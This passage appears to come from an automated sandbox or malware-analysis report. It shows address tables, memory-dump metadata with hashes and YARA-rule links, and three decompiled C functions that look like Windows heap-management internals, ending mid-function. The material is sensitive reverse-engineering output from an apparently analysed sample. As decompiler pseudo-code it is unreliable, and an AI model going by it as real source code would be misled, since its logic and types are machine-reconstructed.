                                  0x1e3cab9a
                                  0x1e3cab9d
                                  0x1e3caba4
                                  0x1e41242c
                                  0x1e412439
                                  0x1e41243e
                                  0x1e41243e
                                  0x1e3cabaa
                                  0x1e3cabad
                                  0x1e3cabad
                                  0x1e3cabb5
                                  0x1e3cabb5
                                  0x1e3cabb9
                                  0x1e3cabc6
                                  0x1e3cabca
                                  0x1e3cad7a
                                  0x1e3cabd0
                                  0x1e3cabd0
                                  0x1e3cabda
                                  0x1e3cabdd
                                  0x1e3cabe2
                                  0x1e3cabe6
                                  0x1e3cabf1
                                  0x1e3cabf4
                                  0x1e3cabfb
                                  0x1e412446
                                  0x1e412453
                                  0x1e412458
                                  0x1e412458
                                  0x1e3cac01
                                  0x1e3cac04
                                  0x1e3cac04
                                  0x1e3cac0c
                                  0x1e3cac0c
                                  0x1e3cac10
                                  0x1e3cad6b
                                  0x1e3cac16
                                  0x1e3cac16
                                  0x1e3cac1c
                                  0x1e3caca7
                                  0x1e3cacba
                                  0x1e3cacbd
                                  0x1e3cacc8
                                  0x1e3cacc9
                                  0x1e3caccc
                                  0x1e3caccf
                                  0x1e3cad00
                                  0x1e3cad04
                                  0x1e3cad07
                                  0x1e3cad0a
                                  0x1e3cad0d
                                  0x00000000
                                  0x1e3cad0f
                                  0x00000000
                                  0x1e3cad0f
                                  0x00000000
                                  0x1e3cad0d
                                  0x1e3cad40
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3cacd1
                                  0x1e3cacd1
                                  0x1e3cacd4
                                  0x1e3cad16
                                  0x1e3cad1b
                                  0x1e3cad54
                                  0x1e3cad1d
                                  0x1e3cad20
                                  0x1e3cad27
                                  0x1e3cad27
                                  0x1e3cacd6
                                  0x1e3cacd6
                                  0x1e3cacdb
                                  0x1e3cad39
                                  0x1e3cacdd
                                  0x1e3cacdd
                                  0x1e3cacdd
                                  0x1e3cacdb
                                  0x1e3cace7
                                  0x1e3caced
                                  0x1e41247f
                                  0x1e41247f
                                  0x1e3cacf6
                                  0x1e3cabbd
                                  0x1e3cabc3
                                  0x1e3cabc3
                                  0x1e3cac2b
                                  0x1e3cac2f
                                  0x1e3cac32
                                  0x1e412460
                                  0x1e412460
                                  0x1e3cac3b
                                  0x1e3cac40
                                  0x1e3cad42
                                  0x1e3cad4a
                                  0x1e3cac46
                                  0x1e3cac46
                                  0x1e3cac48
                                  0x1e3cad5b
                                  0x1e3cac4e
                                  0x1e3cac4e
                                  0x1e3cac51
                                  0x1e3cac58
                                  0x1e3cac5d
                                  0x1e3cac66
                                  0x1e3cac6d
                                  0x1e3cac74
                                  0x1e3cac77
                                  0x1e412467
                                  0x1e412472
                                  0x1e412477
                                  0x1e412477
                                  0x1e3cac77
                                  0x1e3cac7d
                                  0x1e3cac83
                                  0x1e3cac88
                                  0x1e3cac88
                                  0x1e3cac8c
                                  0x1e3caca4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3cac8e
                                  0x1e3cac8e
                                  0x1e3cac90
                                  0x1e3cac93
                                  0x00000000
                                  0x1e3cac46
                                  0x1e3cac40
                                  0x1e3cac1c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3cabb9
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7a7078d530c80ee0c1a36c2b4fc700830d9f9a38253d260b9957211b3e47b5c
                                  • Instruction ID: 426c28c31b7504aff524b44dc377a276660a9a32a355eb8abdce65ace9722575
                                  • Opcode Fuzzy Hash: b7a7078d530c80ee0c1a36c2b4fc700830d9f9a38253d260b9957211b3e47b5c
                                  • Instruction Fuzzy Hash: 9F81D772A0025A8BDB14CE59C4A4B6AB7F2EF84315F15835BD942EF345D630FD46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E4725DD, Relevance: .2, Instructions: 232COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E1E4725DD(signed int __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E1E472E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x1e496110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x1e496110; // 0x53637f71
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x1e496110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_push("true");
				_pop(_t154);
				_v12 = E1E3ED340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E1E3ED0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E1E3BFFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x1e38ac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x1e38ac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x1e38ac00; // 0x6060706
					_t48 = _t123 + 0x1e38ac00; // 0x6070708
					_t142 = _v16;
					if(E1E472FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E1E3C2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1e496110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x1e496110; // 0x53637f71
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1e496110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1e496110 ^ _t168) & 0x7fff0000;
					}
					E1E47241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                  0x1e4725e6
                                  0x1e4725f6
                                  0x1e4725fb
                                  0x1e4725fe
                                  0x1e472603
                                  0x1e472610
                                  0x1e472611
                                  0x1e472613
                                  0x1e47262f
                                  0x1e472634
                                  0x1e472639
                                  0x1e472641
                                  0x1e472643
                                  0x1e472646
                                  0x1e472648
                                  0x1e472649
                                  0x1e472649
                                  0x1e472649
                                  0x1e472646
                                  0x1e47263b
                                  0x1e47263b
                                  0x1e47263d
                                  0x1e47263d
                                  0x1e472639
                                  0x1e472651
                                  0x1e472653
                                  0x1e472655
                                  0x1e472657
                                  0x1e47265c
                                  0x1e472668
                                  0x1e47266a
                                  0x1e472675
                                  0x1e47267c
                                  0x1e472680
                                  0x1e472684
                                  0x1e472687
                                  0x1e472692
                                  0x1e472695
                                  0x1e472698
                                  0x1e47269d
                                  0x1e4726a2
                                  0x1e4726a4
                                  0x1e4726a4
                                  0x1e4726a8
                                  0x1e4726ad
                                  0x1e4726b2
                                  0x1e4726c0
                                  0x1e4726c6
                                  0x1e4726c9
                                  0x1e4726d1
                                  0x1e4726d4
                                  0x1e4726e2
                                  0x1e4726ea
                                  0x1e4726ed
                                  0x1e4726f1
                                  0x1e4726f6
                                  0x1e4726f9
                                  0x1e472707
                                  0x1e47270d
                                  0x1e472710
                                  0x1e472713
                                  0x1e472718
                                  0x1e47271d
                                  0x1e47271d
                                  0x1e472722
                                  0x1e472750
                                  0x1e472758
                                  0x1e47275d
                                  0x1e472760
                                  0x1e472766
                                  0x1e472769
                                  0x1e47276e
                                  0x1e472771
                                  0x1e472777
                                  0x1e47277d
                                  0x1e472783
                                  0x1e472791
                                  0x1e4727a7
                                  0x1e4727a9
                                  0x1e4727ab
                                  0x1e4727ab
                                  0x1e4727b1
                                  0x1e4727b4
                                  0x1e4727b4
                                  0x1e4727bc
                                  0x1e4727bf
                                  0x1e4727c2
                                  0x1e4727c2
                                  0x1e4727db
                                  0x1e4727df
                                  0x1e4727e5
                                  0x1e4727e8
                                  0x1e4727f0
                                  0x1e4727ff
                                  0x1e4727ff
                                  0x1e4727f2
                                  0x1e4727f4
                                  0x1e4727f4
                                  0x1e47281a
                                  0x1e472824
                                  0x1e472826
                                  0x1e472834
                                  0x1e472843
                                  0x1e472858
                                  0x1e472858
                                  0x1e472866
                                  0x1e472866
                                  0x1e472873

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c07936d7ee3767c36355623f780667e76330a97823e6939fa71b6004a1cbaa8
                                  • Instruction ID: a3862295c8f5c5cd67d601b31262c568cd502809159bc4a36c801e70d6387ab5
                                  • Opcode Fuzzy Hash: 7c07936d7ee3767c36355623f780667e76330a97823e6939fa71b6004a1cbaa8
                                  • Instruction Fuzzy Hash: 3E81C372E101159BCB08CF79C8916BEB7F1FF88211B1686AAD851EB395DA34E901CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E471D55, Relevance: .2, Instructions: 226COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E1E471D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1e481070);
				E1E3FD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E1E47337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E1E4733B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E1E3E96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E1E4733B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E1E3DE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1e495880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t142 = _t136 + 0x14;
						 *((intOrPtr*)(_t136 + 0x14)) = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E1E3DDFDF(_t136 + 0x14, 1, _t142);
					}
					return E1E3FD0D1(_t103);
				}
			}





































                                  0x1e471d55
                                  0x1e471d55
                                  0x1e471d57
                                  0x1e471d5c
                                  0x1e471d63
                                  0x1e471d66
                                  0x1e471d69
                                  0x1e471d6c
                                  0x1e471d6e
                                  0x1e471d71
                                  0x1e471d74
                                  0x1e471d77
                                  0x1e471d7a
                                  0x1e471d7d
                                  0x1e471d82
                                  0x1e471d85
                                  0x1e471d88
                                  0x1e471d8d
                                  0x1e471d90
                                  0x1e471d94
                                  0x1e471d96
                                  0x1e471d98
                                  0x1e471d98
                                  0x1e471d9b
                                  0x1e471d9e
                                  0x00000000
                                  0x1e471da1
                                  0x1e471da5
                                  0x1e471e78
                                  0x1e471e78
                                  0x1e471e82
                                  0x1e471e87
                                  0x1e471e8a
                                  0x1e471e8d
                                  0x1e471e92
                                  0x1e471e95
                                  0x1e471e98
                                  0x1e471e9b
                                  0x1e471ede
                                  0x1e471ee3
                                  0x1e471ee8
                                  0x1e471ef2
                                  0x1e471ef2
                                  0x1e471ef5
                                  0x1e471ef8
                                  0x1e471efe
                                  0x1e471f03
                                  0x00000000
                                  0x1e471f09
                                  0x1e471f0c
                                  0x1e471f0e
                                  0x1e471f11
                                  0x00000000
                                  0x1e471f17
                                  0x1e471f17
                                  0x1e471f1a
                                  0x1e471f31
                                  0x1e471f34
                                  0x1e471f3f
                                  0x1e471f42
                                  0x1e471f45
                                  0x1e471f47
                                  0x1e471f4a
                                  0x1e471f4d
                                  0x1e471f4f
                                  0x1e471f63
                                  0x1e471f65
                                  0x1e471f67
                                  0x00000000
                                  0x1e471f69
                                  0x1e471f69
                                  0x1e471f72
                                  0x1e471f72
                                  0x1e471f75
                                  0x1e471f77
                                  0x00000000
                                  0x00000000
                                  0x1e471f6e
                                  0x1e471f70
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e471f70
                                  0x1e471f83
                                  0x1e471f83
                                  0x1e471f85
                                  0x00000000
                                  0x1e471f85
                                  0x1e471f51
                                  0x1e471f53
                                  0x1e471f5a
                                  0x1e471f5c
                                  0x1e471f87
                                  0x1e471f87
                                  0x1e471f87
                                  0x1e471f8b
                                  0x1e471f8d
                                  0x1e471f90
                                  0x00000000
                                  0x1e471f90
                                  0x1e471f1c
                                  0x1e471f1c
                                  0x00000000
                                  0x1e471f22
                                  0x1e471f22
                                  0x1e471f25
                                  0x1e471f28
                                  0x1e471f97
                                  0x1e471f97
                                  0x1e471f9d
                                  0x1e471fa7
                                  0x1e471faa
                                  0x1e471fb1
                                  0x1e471fb9
                                  0x1e471fbd
                                  0x1e471fbe
                                  0x1e471fc0
                                  0x1e471f2a
                                  0x1e471f93
                                  0x1e471f93
                                  0x1e471f95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e471f95
                                  0x1e471f28
                                  0x1e471f1c
                                  0x1e471f1a
                                  0x1e471f11
                                  0x1e471e9d
                                  0x1e471ea0
                                  0x1e471eae
                                  0x1e471eb4
                                  0x1e471ebc
                                  0x1e471ebc
                                  0x1e471ec2
                                  0x1e471ec8
                                  0x1e471ecd
                                  0x00000000
                                  0x1e471ed3
                                  0x1e471ed3
                                  0x00000000
                                  0x1e471ed3
                                  0x1e471ecd
                                  0x1e471dab
                                  0x1e471dab
                                  0x1e471db1
                                  0x1e471db3
                                  0x1e471db9
                                  0x1e471dbf
                                  0x1e471dc2
                                  0x1e471dda
                                  0x1e471ddd
                                  0x1e471de0
                                  0x1e471de9
                                  0x1e471dec
                                  0x1e471def
                                  0x1e471df1
                                  0x1e471df3
                                  0x1e471e0a
                                  0x1e471e0c
                                  0x1e471e0e
                                  0x00000000
                                  0x1e471e10
                                  0x1e471e10
                                  0x1e471e13
                                  0x1e471e16
                                  0x1e471e16
                                  0x1e471e19
                                  0x1e471e1c
                                  0x1e471e1e
                                  0x1e471e20
                                  0x00000000
                                  0x00000000
                                  0x1e471e22
                                  0x1e471e24
                                  0x00000000
                                  0x1e471e26
                                  0x00000000
                                  0x1e471e26
                                  0x00000000
                                  0x1e471e24
                                  0x1e471e30
                                  0x1e471e30
                                  0x00000000
                                  0x1e471e30
                                  0x1e471df5
                                  0x1e471df7
                                  0x1e471e01
                                  0x1e471e32
                                  0x1e471e34
                                  0x1e471e36
                                  0x00000000
                                  0x1e471e36
                                  0x1e471dc4
                                  0x1e471dc4
                                  0x00000000
                                  0x1e471dc6
                                  0x1e471dc6
                                  0x1e471dc9
                                  0x1e471dcf
                                  0x1e471dd1
                                  0x1e471e38
                                  0x1e471e38
                                  0x1e471e38
                                  0x1e471e38
                                  0x1e471dc4
                                  0x1e471dbb
                                  0x1e471dbb
                                  0x1e471dbb
                                  0x1e471dbb
                                  0x1e471e3a
                                  0x1e471e3a
                                  0x1e471e3d
                                  0x1e471e40
                                  0x1e471e43
                                  0x1e471e6f
                                  0x1e471fc7
                                  0x1e471fc7
                                  0x1e471e75
                                  0x1e471e75
                                  0x00000000
                                  0x1e471e75
                                  0x1e471e6f
                                  0x1e471fca
                                  0x1e471fca
                                  0x1e471fce
                                  0x1e471fd0
                                  0x1e471fd3
                                  0x1e471fd9
                                  0x1e471fde
                                  0x1e471fe4
                                  0x1e471fe4
                                  0x1e471fee
                                  0x1e471fee

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
                                  • Instruction ID: 7fb750c4c9091f84531e326bb53b5614921b848db16c385013b262d1adb4b2f1
                                  • Opcode Fuzzy Hash: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
                                  • Instruction Fuzzy Hash: 19814C75E102598FDB08CFA9C8909ECB7F3BF49354B14436AE415AB394DB31A94ACF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E45FA2B, Relevance: .2, Instructions: 214COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E1E45FA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x1e480e38);
				_t98 = E1E3FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x1e497bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
